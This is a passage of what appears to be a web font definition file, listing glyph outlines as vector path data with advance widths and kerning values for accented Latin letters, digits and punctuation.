216r121,-338r60,-195r-32,41v-79,107,-182,223,-266,287v-34,26,-96,61,-159,61v-84,0,-120,-71,-120,-176v0,-137,69,-277,208,-422v168,-175,299,-263,392,-263xm196,-159v-10,99,76,133,145,89v122,-79,310,-315,377,-469v24,-56,37,-103,37,-142v0,-89,-65,-117,-137,-71v-70,45,-219,186,-273,262v-88,125,-135,189,-149,331","w":875},{"d":"540,-1314r89,0r0,721r-89,0r0,-721xm540,-216r89,0r0,721r-89,0r0,-721","w":1024},{"d":"175,9v-35,19,-96,16,-96,-32v0,-32,69,-175,92,-228r151,-355v19,-46,35,-86,47,-121r-164,1v1,-15,7,-32,17,-51v96,-3,153,-5,171,-7v13,-32,25,-58,34,-77v27,-54,55,-142,84,-207v29,-4,69,-5,97,2r2,16v0,13,-30,86,-90,220v-7,15,-12,31,-17,47v60,11,117,4,185,4v0,22,-4,40,-12,54v-45,6,-172,0,-205,15r-258,605v-1,8,8,16,19,16v18,0,40,-11,67,-34v59,-50,115,-108,168,-175v11,6,21,13,30,21v-123,154,-176,205,-322,286","w":512,"k":{"p":-51}},{"d":"334,-1130v74,-76,189,-167,325,-140v6,-13,15,-31,24,-35v33,-2,40,-5,64,5v1,10,2,18,0,27r-126,304v-20,46,-33,81,-39,105v32,-23,70,-58,115,-103v11,7,21,15,29,24v-53,59,-112,140,-198,140v-26,0,-44,-5,-45,-29v0,-17,15,-57,46,-122v-90,100,-172,150,-247,150v-47,0,-71,-27,-71,-77v0,-31,15,-79,44,-143v13,-28,38,-64,79,-106xm310,-907v0,36,34,45,61,29v115,-75,223,-176,252,-321v0,-21,-15,-35,-38,-33v-101,9,-206,149,-248,237v-18,40,-27,69,-27,88","w":533},{"d":"432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582xm1033,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":1387},{"d":"521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462xm599,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm852,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","k":{"v":-25}},{"d":"-298,419v-4,-30,40,-66,70,-65v53,2,73,48,65,109v2,10,8,10,25,10v87,0,118,-45,154,-118v31,-64,44,-121,57,-168v135,-503,229,-1045,535,-1381v54,-59,186,-135,295,-135v159,0,249,147,175,283v-45,82,-106,114,-210,172v-97,55,-126,64,-170,127v-13,18,-17,41,-17,64v0,70,115,300,107,425v-8,121,-57,206,-140,261v-28,17,-54,26,-80,26v-92,-2,-238,-50,-194,-165v34,-41,86,-34,107,10v9,78,83,135,156,86v38,-25,58,-108,59,-148v5,-147,-93,-305,-93,-446v0,-93,41,-116,101,-184v13,-15,52,-45,113,-92v91,-70,149,-124,175,-160v26,-36,39,-70,39,-101v2,-65,-48,-120,-112,-120v-72,0,-145,29,-215,91v-171,152,-307,556,-386,845r-114,419v-42,177,-92,296,-150,357v-59,61,-123,92,-194,92v-84,0,-150,-34,-158,-94","w":853},{"d":"814,-1370v53,-33,145,-18,140,52v-6,74,-59,185,-77,222r-141,293r-48,0r45,-426v18,-72,30,-109,81,-141xm366,-1360v49,-47,159,-34,153,43v-6,88,-29,104,-83,219r-139,295r-43,0r31,-296v16,-144,18,-200,81,-261","w":853},{"d":"145,25v-22,16,-80,13,-73,-22v18,-88,70,-178,99,-260r324,-924v12,-41,24,-54,10,-79v-24,-15,-70,-16,-95,-30r4,-21v147,-14,171,-22,241,-18r-91,253v-9,25,-22,65,-39,118v-59,198,-132,330,-191,524v86,-121,213,-286,279,-332v45,-31,86,-50,128,-50v82,0,127,75,124,175v-10,251,-160,555,-325,647v-36,20,-71,28,-101,28v-54,0,-89,-45,-89,-85v0,-23,29,-44,58,-42v50,-7,54,60,97,70v13,0,28,-16,52,-43v61,-70,211,-465,211,-616v0,-73,-31,-109,-88,-83v-36,17,-75,49,-117,93v-42,44,-107,130,-199,255v-34,45,-171,343,-194,401v-9,21,-17,35,-25,41","w":853,"k":{"y":27}},{"d":"680,-779v31,0,67,-10,97,-4v2,34,8,43,-4,64v-42,9,-83,-10,-127,-20v106,241,-102,525,-302,563v-47,9,-86,23,-111,46v-38,35,-8,69,36,106r118,57v102,36,178,78,231,121v59,49,83,152,36,222v-39,58,-96,91,-196,110v-252,47,-521,8,-627,-133v-35,-48,-25,-100,20,-136v39,-31,151,-87,336,-168v-51,-41,-83,-71,-98,-89v-22,-45,10,-61,53,-78v27,-11,72,-37,133,-77v-24,-35,-90,-81,-102,-147v-33,-183,60,-336,156,-420v35,-30,122,-56,173,-58v61,-3,112,41,178,41xm583,-666v5,-108,-107,-143,-179,-76v-44,41,-156,320,-156,411v0,55,39,103,87,110v83,-20,95,-37,145,-119v54,-88,98,-229,103,-326xm-66,246v-48,152,119,197,258,217v153,22,315,-18,385,-86v38,-59,7,-110,-47,-162v-36,-34,-223,-106,-303,-140v-75,26,-242,102,-293,171","w":661,"k":{"\u00e5":27,"\u00e4":27,"y":-76,"p":-127,"l":27,"g":-102,"a":27,".":-51,",":-127}},{"d":"394,-1197v0,-54,-116,-41,-157,-58r15,-53v171,22,301,8,498,-3v3,22,4,24,2,44v-19,9,-195,16,-192,45v-50,140,-90,442,-118,623v-30,194,-43,227,-17,368v13,71,52,122,103,153v102,61,196,71,311,51v248,-44,326,-129,391,-363v20,-72,107,-604,107,-755v0,-95,-101,-121,-197,-127v-2,-14,0,-23,4,-42v153,14,300,12,461,4r1,39v-28,6,-129,26,-146,39v-49,37,-68,95,-79,181r-43,338v-42,235,-69,510,-233,637v-91,71,-254,118,-432,102v-242,-22,-412,-120,-412,-378v0,-220,38,-292,83,-544r47,-266v2,-14,3,-26,3,-35xm731,-1627v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":1472},{"d":"521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462xm814,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47"},{"d":"270,-1316v17,0,242,12,263,12v21,0,60,-2,95,-2v83,0,143,-6,182,-10r0,39v-112,25,-195,3,-213,99r-32,167v106,-22,264,-21,352,27r70,40v77,60,99,82,131,166v58,151,-4,309,-98,389v-65,55,-139,109,-247,124v-65,9,-102,13,-109,13v-68,0,-145,-19,-231,-56r-29,154v-7,25,-11,45,-11,60v-2,59,132,39,167,62v-2,19,0,33,-4,45v-17,0,-57,-7,-119,-9v-136,-5,-258,-8,-390,8r0,-40v87,-17,164,-9,199,-56v32,-98,47,-147,81,-354r40,-245r46,-253r4,-39v29,-137,44,-224,44,-261v-18,-56,-139,-20,-203,-36v1,-8,5,-23,12,-44xm654,-980v-37,0,-69,3,-97,9r-69,382r-51,248v107,45,229,60,330,4v104,-57,123,-77,172,-160v130,-221,-18,-483,-285,-483","w":1131},{"d":"168,8v-34,21,-90,28,-90,-22v0,-67,29,-100,64,-170r171,-337r70,-149v16,-32,27,-36,12,-62v-22,9,-51,38,-93,77v-34,31,-78,76,-107,105r-32,-7v36,-59,176,-201,250,-241v48,-26,118,-34,118,21v0,28,-21,55,-32,91v-20,66,-277,522,-285,608v17,-3,41,-17,70,-42v115,-97,167,-152,244,-234v157,-168,203,-225,317,-463v36,-3,65,-9,82,13v-14,42,-40,111,-79,206r-186,464v-11,24,-19,46,-22,66r7,1v63,-36,119,-116,161,-168r32,5v-32,61,-84,129,-162,198v-58,50,-73,69,-133,52v-12,-13,-18,-25,-18,-36v0,-33,14,-82,41,-146r149,-349r-79,90v-170,195,-270,309,-470,429xm837,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":875},{"d":"394,-1197v0,-54,-116,-41,-157,-58r15,-53v171,22,301,8,498,-3v3,22,4,24,2,44v-19,9,-195,16,-192,45v-50,140,-90,442,-118,623v-30,194,-43,227,-17,368v13,71,52,122,103,153v102,61,196,71,311,51v248,-44,326,-129,391,-363v20,-72,107,-604,107,-755v0,-95,-101,-121,-197,-127v-2,-14,0,-23,4,-42v153,14,300,12,461,4r1,39v-28,6,-129,26,-146,39v-49,37,-68,95,-79,181r-43,338v-42,235,-69,510,-233,637v-91,71,-254,118,-432,102v-242,-22,-412,-120,-412,-378v0,-220,38,-292,83,-544r47,-266v2,-14,3,-26,3,-35xm840,-1447v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm1093,-1530v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":1472,"k":{"A":102}},{"d":"310,21v-86,-1,-113,-20,-150,-75v-20,15,-38,42,-60,64r-10,-48r50,-59v-60,-167,17,-353,82,-467v54,-96,137,-182,220,-226v39,-21,76,-30,113,-30v76,1,102,26,139,74r53,-61v7,12,13,25,18,39r-53,64v45,142,-4,348,-52,438v-50,95,-158,223,-249,266v-31,14,-64,21,-101,21xm653,-697v-3,-54,-43,-96,-97,-76v-98,35,-117,86,-180,180v-66,100,-140,287,-157,401v23,-23,79,-90,170,-196xm210,-115v-12,86,84,119,152,75v118,-76,214,-315,262,-468v21,-66,27,-95,26,-122r-290,337v-93,107,-143,167,-150,178","w":725},{"d":"331,0r309,-1096v-107,77,-217,140,-332,187r-4,-56v207,-96,362,-206,465,-329r66,0r-367,1294r-137,0","w":960},{"d":"-441,406v2,-52,65,-61,109,-34v15,4,63,65,86,72v93,29,230,-42,282,-84v70,-56,185,-155,226,-272v59,-172,73,-367,58,-608v-6,-97,-7,-138,-43,-180v-20,-15,-48,-7,-63,12v-23,29,-46,83,-69,163v-13,4,-19,0,-33,-9v37,-143,51,-184,104,-252v10,-12,39,-32,71,-32v39,0,70,25,93,75v88,182,35,567,-7,761v127,-186,233,-375,243,-673v2,-71,-20,-160,51,-160v37,0,51,20,51,60v0,153,-156,549,-218,647v-90,142,-182,274,-291,387v-114,118,-264,219,-442,219v-80,0,-135,-10,-164,-30v-29,-20,-44,-41,-44,-62xm733,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":683},{"d":"168,8v-34,21,-90,28,-90,-22v0,-67,29,-100,64,-170r171,-337r70,-149v16,-32,27,-36,12,-62v-22,9,-51,38,-93,77v-34,31,-78,76,-107,105r-32,-7v36,-59,176,-201,250,-241v48,-26,118,-34,118,21v0,28,-21,55,-32,91v-20,66,-277,522,-285,608v17,-3,41,-17,70,-42v115,-97,167,-152,244,-234v157,-168,203,-225,317,-463v36,-3,65,-9,82,13v-14,42,-40,111,-79,206r-186,464v-11,24,-19,46,-22,66r7,1v63,-36,119,-116,161,-168r32,5v-32,61,-84,129,-162,198v-58,50,-73,69,-133,52v-12,-13,-18,-25,-18,-36v0,-33,14,-82,41,-146r149,-349r-79,90v-170,195,-270,309,-470,429xm552,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm805,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":875},{"d":"97,467r498,-1747r386,1r-11,39r-340,0r-477,1669r337,2r-11,38","w":619},{"d":"168,414v44,1,83,-48,83,-95v0,-39,-17,-69,-49,-94v-24,-20,-32,-14,-33,-44v23,-65,31,-70,84,-196r27,1v-9,35,-41,93,-50,128v2,23,9,23,29,46v29,33,44,74,44,124v0,98,-73,175,-170,173v-47,-1,-83,-11,-85,-53v-1,-19,12,-38,26,-40v27,5,68,58,94,50","w":683},{"d":"1231,-1394v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106","w":1557},{"d":"375,-52v34,40,107,32,181,32v241,0,484,2,633,-116v49,-38,89,-94,119,-170v12,0,21,-1,31,2v-7,33,-36,136,-87,311r-627,10r-408,-2v-73,4,-148,-2,-222,1r-1,-31r93,-4v53,-6,80,-10,136,-24v3,-11,6,-26,9,-43v36,-177,58,-304,72,-379r62,-339v2,-8,6,-41,15,-99v16,-102,44,-181,48,-301v-10,-57,-40,-40,-132,-52r-64,-4v1,-12,3,-24,7,-37r354,1r704,-8r82,3v-3,29,-28,183,-47,222v-10,-1,-18,-6,-25,-13v-19,-77,-5,-111,-26,-163v-163,-22,-340,-2,-522,-2v-68,0,-132,-4,-180,24r-87,501v-1,9,-2,19,-3,30v24,-8,591,-35,582,-41v26,-7,46,-17,60,-31v14,-14,40,-61,77,-141r38,-5r-88,431v-12,-1,-24,-2,-35,-2v-1,-28,9,-47,7,-94v-3,-93,-18,-108,-113,-108v-47,0,-102,9,-167,14v-58,4,-193,8,-280,16r-87,8r-113,547v-3,25,-6,35,4,56xm805,-1447v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm1058,-1530v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":1408},{"d":"1388,-1290v-89,0,-166,-75,-166,-164v0,-90,76,-168,166,-168v89,0,165,77,165,166v0,88,-77,166,-165,166xm1267,-1456v0,66,55,122,121,122v66,0,122,-56,122,-121v0,-66,-57,-123,-122,-123v-65,0,-121,56,-121,122xm198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106","w":1557,"k":{"y":78,"Y":51,"W":51,"V":129,"U":53,"Q":-25,"G":-25}},{"d":"106,-356v10,-26,31,-63,42,-89r187,-5r119,3v51,-4,45,-2,97,2v-13,41,-26,73,-39,94v-21,3,-42,6,-60,0v-56,5,-64,-2,-103,-2v-67,0,-119,2,-156,5v-20,-5,-49,-7,-87,-8","w":533},{"d":"506,-1315v56,46,117,140,147,217r205,-56r14,38r-201,58v100,265,112,526,-1,766v-53,112,-113,192,-180,243v-67,51,-134,76,-199,76v-115,0,-171,-102,-171,-241v0,-157,54,-304,168,-437v116,-135,215,-199,365,-134v-2,-85,-16,-169,-41,-253r-181,49r-15,-37r180,-55v-42,-89,-52,-123,-123,-210xm650,-672v0,-87,-67,-121,-132,-74v-127,92,-221,263,-274,440v-26,84,-38,151,-38,203v0,101,123,105,185,45v77,-75,259,-454,259,-614","w":811},{"d":"406,28v-215,0,-392,-185,-275,-377v84,-137,175,-199,345,-302v-95,-109,-142,-214,-142,-314v0,-118,101,-241,192,-285v56,-27,119,-44,191,-44v190,0,317,153,230,316v-77,144,-155,166,-324,283v99,119,165,193,171,357v7,208,-172,366,-388,366xm696,-1255v-176,1,-279,205,-203,375v17,40,50,90,98,150v103,-77,172,-143,208,-198v36,-55,54,-113,54,-172v1,-94,-63,-156,-157,-155xm414,-15v195,0,318,-227,220,-417v-25,-49,-65,-112,-126,-185v-130,90,-188,145,-245,273v-24,54,-34,108,-34,159v-1,101,79,170,185,170","w":960},{"d":"257,2v-56,-2,-140,12,-224,12v0,-14,-2,-28,4,-37v59,-10,139,-10,190,-27v17,-71,54,-268,67,-364v12,-84,113,-612,138,-810v0,-4,-2,-11,-5,-21v-59,-18,-110,-5,-182,-19v0,-15,2,-30,6,-45v170,13,372,8,533,2v7,20,5,23,-4,43r-104,7v-32,7,-72,4,-97,18v-36,152,-49,282,-83,446v-6,30,-10,63,-13,100v253,19,495,-14,760,5v10,0,23,-1,40,-3r93,-496v2,-19,2,-41,2,-62v-34,-22,-130,-15,-185,-22v1,-15,4,-27,8,-37r217,4r288,-4v0,11,-3,23,-8,36v-48,11,-126,8,-171,23v-24,52,-27,123,-39,189r-182,980v-1,8,-2,15,-2,22v19,19,38,18,73,22v14,1,56,7,127,17v-2,11,-4,23,-10,30v-177,-11,-393,-12,-550,4v1,-18,-2,-37,14,-39r126,-13v27,-2,50,-5,69,-10v40,-145,24,-117,88,-408v15,-71,25,-130,30,-178v-249,-19,-545,3,-799,3r-33,206r-66,352v0,5,1,11,4,17v24,15,21,7,71,15r122,19v0,11,-2,22,-6,35v-107,4,-205,-7,-307,-12","w":1579},{"d":"1060,-1301v114,-22,224,2,351,2v39,0,71,-9,108,-8r0,47v-91,19,-121,31,-199,95v-21,17,-102,95,-241,236r-258,275r397,3v15,0,29,1,41,4r-10,40r-462,-6v-29,68,-59,172,-85,248v227,0,387,1,479,2r-10,40r-248,4r-237,-1v-49,143,-57,136,-68,229v8,81,119,56,204,71v1,14,2,20,-1,32v-71,-5,-125,5,-191,5v-64,0,-118,-9,-185,-7v-79,3,-135,12,-221,7v3,-15,7,-28,12,-39v111,-13,137,-4,188,-30v41,-40,57,-96,76,-152r39,-117r-446,-2r10,-40v158,7,293,-3,451,-2r75,-223r-10,-23r-448,4r10,-40v37,-2,176,-4,419,-6v-13,-27,-22,-48,-28,-63v-65,-157,-119,-286,-167,-384v-27,-56,-43,-121,-76,-144v-16,-11,-61,-19,-136,-28r1,-35v118,-4,170,17,321,17v66,0,119,-4,160,-13v0,18,3,32,-1,49v-38,3,-128,11,-144,18v-6,3,-11,10,-16,21r240,561v12,-6,19,-10,22,-13r386,-394v28,-26,82,-94,94,-138v-8,-68,-110,-64,-196,-60r0,-42","w":1280},{"d":"450,-794v99,-51,197,25,197,129v0,72,-48,159,-90,187v-57,37,-71,57,-158,80v-41,11,-93,24,-157,37v-22,61,-33,122,-33,184v0,82,48,167,128,128v82,-39,131,-116,166,-207v15,0,26,0,41,2v-20,75,-69,148,-148,220v-49,45,-100,67,-153,67v-178,0,-151,-313,-91,-449v40,-91,84,-173,144,-244v80,-95,76,-94,154,-134xm575,-711v2,-34,-25,-67,-55,-67v-18,0,-38,11,-64,31v-63,48,-171,241,-197,336v148,-20,310,-120,316,-300xm382,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":597},{"d":"501,-1102v-44,0,-76,-35,-76,-81v0,-45,44,-90,90,-90v43,0,84,38,82,79v-2,49,-28,92,-96,92xm138,24v-38,4,-62,-16,-62,-49v0,-168,236,-492,309,-668v9,-22,9,-20,1,-41v-51,-1,-80,33,-100,46v-31,21,-58,51,-85,82r-58,13v51,-69,108,-124,171,-163v63,-39,112,-59,148,-59v28,-1,46,15,46,41v1,50,-53,156,-89,235v-62,139,-131,253,-201,385v-19,36,-31,60,-31,77v0,9,9,18,19,18v83,-27,152,-111,201,-185r41,0v-60,102,-163,254,-310,268","w":469,"k":{"v":-25}},{"d":"856,-1335r22,25v-248,216,-401,441,-509,776v-111,342,-118,687,-4,1039r-29,18v-197,-416,-185,-899,24,-1305v111,-216,276,-401,496,-553","w":555},{"d":"512,-1116v37,-42,53,-126,-22,-125v-47,0,-84,28,-110,83r-44,-18v23,-67,96,-120,184,-120v105,0,174,85,109,160v-17,20,-61,50,-131,89v68,20,108,44,108,113v0,209,-245,338,-498,324r8,-34v125,0,225,-38,300,-113v54,-54,81,-107,81,-158v1,-44,-26,-75,-68,-75v-36,0,-78,19,-125,58v-13,-9,-23,-20,-30,-32v57,-44,205,-114,238,-152","w":576},{"d":"1275,-1510v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm528,21v-185,-32,-360,-22,-548,-19r0,-36v92,-18,227,3,248,-94r83,-381r50,-283v10,-65,34,-121,37,-220v15,-61,28,-131,28,-201v0,-12,-4,-20,-13,-25v-19,-11,-86,-24,-201,-40r9,-32r369,-1r129,189r70,110r451,725v26,48,53,95,82,141v9,-41,12,-85,21,-130v25,-129,43,-216,49,-260r63,-436v15,-139,36,-175,14,-256v-14,-17,-150,-38,-206,-49v-3,-15,-3,-19,-3,-32v170,7,346,19,513,3v-3,15,-7,30,-12,44v-121,16,-164,8,-209,42v-37,112,-64,309,-80,420r-39,273r-70,408v-14,89,-21,142,-22,157r-55,-1v-13,-25,-29,-52,-47,-79r-319,-502r-72,-108r-228,-359r-136,-200r-129,694r-24,178v-7,81,-35,168,-37,241v0,8,4,17,13,26v83,31,107,26,230,58","w":1600},{"d":"-60,441v-56,-1,-82,-62,-58,-119v4,-10,15,-36,37,-77v147,-276,232,-692,336,-1030r124,0r-131,458v-21,71,-31,123,-31,156v-1,66,46,114,112,113v48,0,94,-15,136,-49v123,-99,178,-209,234,-403r79,-275r125,0r-156,541v-22,74,-37,185,50,185v84,0,118,-79,149,-153r40,0v-33,126,-116,235,-245,235v-114,0,-168,-106,-133,-228v-63,111,-192,228,-340,228v-94,0,-134,-47,-158,-130v-38,126,-45,172,-65,331v-10,84,-22,139,-35,166v-17,34,-41,51,-70,51","w":1024},{"d":"561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612","w":725,"k":{"z":51,"y":27,"x":53,"g":27,".":78,",":51}},{"d":"394,-1197v0,-54,-116,-41,-157,-58r15,-53v171,22,301,8,498,-3v3,22,4,24,2,44v-19,9,-195,16,-192,45v-50,140,-90,442,-118,623v-30,194,-43,227,-17,368v13,71,52,122,103,153v102,61,196,71,311,51v248,-44,326,-129,391,-363v20,-72,107,-604,107,-755v0,-95,-101,-121,-197,-127v-2,-14,0,-23,4,-42v153,14,300,12,461,4r1,39v-28,6,-129,26,-146,39v-49,37,-68,95,-79,181r-43,338v-42,235,-69,510,-233,637v-91,71,-254,118,-432,102v-242,-22,-412,-120,-412,-378v0,-220,38,-292,83,-544r47,-266v2,-14,3,-26,3,-35xm1087,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":1472},{"d":"690,-1295v181,-6,307,109,305,281v-2,135,-45,194,-120,280v-118,135,-484,445,-664,608r570,0r-33,126r-714,0r6,-27v271,-257,453,-433,545,-529v113,-119,187,-215,222,-289v23,-46,34,-99,34,-159v1,-126,-61,-200,-181,-200v-173,0,-222,92,-296,240r-54,0v60,-187,176,-324,380,-331","w":960},{"d":"491,-27v-144,53,-179,52,-296,10v-25,41,-110,284,-162,425v-10,26,-20,48,1,58v37,17,111,5,143,24v3,10,9,18,0,27r-107,0v-83,-1,-185,1,-261,-1r-97,-2v-2,-11,0,-17,5,-31v47,-17,154,-9,191,-40v122,-258,207,-565,312,-842r75,-220v14,-41,27,-83,38,-124v-75,10,-143,35,-201,52v-5,0,-14,-2,-25,-7v-4,-16,0,-26,14,-35v33,-21,110,-44,232,-70v43,-175,96,-302,137,-441v12,-40,20,-68,33,-83v24,-3,37,-2,67,0v31,37,11,35,0,89v-3,15,-15,45,-32,92v-30,79,-63,188,-98,326v230,-25,378,82,378,291v0,188,-113,338,-226,431v-45,37,-86,58,-121,71xm234,-134v-27,111,108,120,191,83v23,-10,69,-34,124,-87v103,-99,172,-237,172,-395v0,-57,-11,-119,-43,-153v-54,-57,-130,-72,-238,-63v-44,137,-82,243,-109,320r-83,239v-7,19,-10,38,-14,56"},{"d":"501,-1296v142,-7,237,107,173,229v-17,33,-55,72,-109,118v-25,22,-133,105,-323,250r328,0r-24,78r-445,0r6,-22v238,-195,377,-316,415,-363v38,-47,57,-92,57,-134v0,-63,-32,-97,-94,-97v-98,0,-121,46,-167,123r-55,0v38,-105,114,-176,238,-182","w":576},{"d":"378,-594v-55,0,-100,-47,-100,-102v0,-66,45,-116,106,-116v52,0,104,56,104,108v0,58,-51,110,-110,110xm195,21v-55,0,-108,-51,-108,-105v0,-59,48,-108,106,-108v54,0,108,47,108,98v0,62,-47,115,-106,115","w":448},{"d":"988,-1076v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm772,-678v7,-26,8,-62,-21,-62v-11,0,-22,5,-37,13v-99,52,-290,305,-333,372v-70,111,-131,224,-183,339v-8,19,-18,32,-29,41v-33,5,-37,4,-72,-2v-9,-19,-2,-20,6,-49v11,-37,87,-211,131,-328r128,-339v-2,-9,-5,-13,-14,-14v-35,0,-89,55,-162,164v-17,2,-17,1,-36,0v62,-108,163,-250,300,-283v3,0,8,0,15,1v29,28,19,60,5,98r-140,377v5,-7,10,-13,14,-19v95,-140,257,-345,378,-427v61,-41,167,-49,167,35v0,56,-15,77,-35,141v-28,85,-175,396,-230,539v0,4,2,10,7,18v37,-8,93,-67,168,-178r41,1v-39,68,-139,203,-220,248v-37,21,-123,38,-123,-11v0,-35,17,-90,51,-164r145,-317r56,-133v13,-29,20,-50,23,-61","w":875},{"d":"368,24v-167,0,-256,-118,-253,-303v3,-191,58,-304,135,-442v95,-168,245,-312,412,-421v139,-91,219,-119,345,-156v7,0,16,4,29,13v-3,42,-8,42,-46,52v-187,51,-403,254,-510,403v-91,128,-252,455,-259,639v-3,90,46,163,122,163v50,0,104,-25,165,-67v100,-69,215,-291,218,-445v1,-61,-43,-119,-97,-119v-42,0,-88,16,-118,37v-13,-2,-14,-17,-15,-31v0,-14,9,-27,28,-39v37,-23,84,-35,141,-35v121,2,191,100,191,225v0,139,-60,265,-179,380v-102,97,-205,146,-309,146","w":960},{"d":"218,-945r1074,0r0,576r-87,0r0,-487r-987,0r0,-89","w":1365},{"d":"217,-859r492,0r0,-494r88,0r0,494r495,0r0,88r-495,0r0,492r-88,0r0,-492r-492,0r0,-88xm217,-52r1075,0r0,89r-1075,0r0,-89","w":1365},{"d":"-224,457v-38,-39,-8,-120,50,-115v56,4,75,24,102,73v44,80,123,26,163,-23v35,-43,63,-112,85,-204v34,-145,54,-236,59,-273v-3,-10,67,-290,85,-380r144,-759v-47,-20,-112,-36,-195,-49r1,-31v42,-10,69,2,119,2v138,0,317,0,409,-7r1,32v-